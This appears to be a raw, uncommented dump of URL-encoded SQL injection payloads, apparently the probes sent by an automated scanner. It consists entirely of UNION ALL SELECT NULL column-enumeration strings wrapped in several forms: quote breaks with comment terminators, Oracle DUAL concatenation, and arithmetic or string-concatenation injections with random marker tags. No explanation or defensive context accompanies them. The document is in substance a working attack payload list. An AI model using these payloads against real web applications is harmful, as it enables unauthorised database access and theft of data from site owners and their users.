1%22%20WHERE%205068%3D5068%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201702%3D1702%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%207149%3D7149%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201589%3D1589%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20%7C%7C%20%28SELECT%201168%20FROM%20DUAL%20WHERE%204760%3D4760%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203358%20FROM%20DUAL%20WHERE%204892%3D4892%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203382%20FROM%20DUAL%20WHERE%205258%3D5258%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205835%20FROM%20DUAL%20WHERE%205662%3D5662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204300%20FROM%20DUAL%20WHERE%204022%3D4022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202470%20FROM%20DUAL%20WHERE%207184%3D7184%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203521%20FROM%20DUAL%20WHERE%201519%3D1519%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208401%20FROM%20DUAL%20WHERE%204021%3D4021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201292%20FROM%20DUAL%20WHERE%204333%3D4333%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204378%20FROM%20DUAL%20WHERE%202404%3D2404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204574%20WHERE%204676%3D4676%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209955%20WHERE%201229%3D1229%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208753%20WHERE%205365%3D5365%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202263%20WHERE%201142%3D1142%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206587%20WHERE%204527%3D4527%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202354%20WHERE%208955%3D8955%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205163%20WHERE%201487%3D1487%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207994%20WHERE%201298%3D1298%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209021%20WHERE%202983%3D2983%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206807%20WHERE%205731%3D5731%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205400%20FROM%20DUAL%20WHERE%202273%3D2273%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203857%20FROM%20DUAL%20WHERE%205569%3D5569%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206657%20FROM%20DUAL%20WHERE%203762%3D3762%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203355%20FROM%20DUAL%20WHERE%204453%3D4453%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%202449%20FROM%20DUAL%20WHERE%205547%3D5547%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201111%20FROM%20DUAL%20WHERE%206241%3D6241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201853%20FROM%20DUAL%20WHERE%205881%3D5881%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207508%20FROM%20DUAL%20WHERE%203019%3D3019%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207371%20FROM%20DUAL%20WHERE%207129%3D7129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209650%20FROM%20DUAL%20WHERE%208564%3D8564%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203367%20WHERE%208905%3D8905%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204545%20WHERE%205184%3D5184%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208753%20WHERE%207967%3D7967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204276%20WHERE%201895%3D1895%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201431%20WHERE%204259%3D4259%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209314%20WHERE%204937%3D4937%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203461%20WHERE%208268%3D8268%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206501%20WHERE%204549%3D4549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203446%20WHERE%202190%3D2190%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%202427%20WHERE%207812%3D7812%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%27%20%2B%20%28SELECT%20%27tPOL%27%20FROM%20DUAL%20WHERE%207849%3D7849%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NOdZ%27%20FROM%20DUAL%20WHERE%203037%3D3037%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RELF%27%20FROM%20DUAL%20WHERE%206850%3D6850%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uhCZ%27%20FROM%20DUAL%20WHERE%204622%3D4622%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JFOz%27%20FROM%20DUAL%20WHERE%206917%3D6917%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Xynp%27%20FROM%20DUAL%20WHERE%203526%3D3526%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MZiW%27%20FROM%20DUAL%20WHERE%202969%3D2969%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qjwd%27%20FROM%20DUAL%20WHERE%204377%3D4377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uerO%27%20FROM%20DUAL%20WHERE%206618%3D6618%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vzQp%27%20FROM%20DUAL%20WHERE%207967%3D7967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Mote%27%20WHERE%202979%3D2979%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 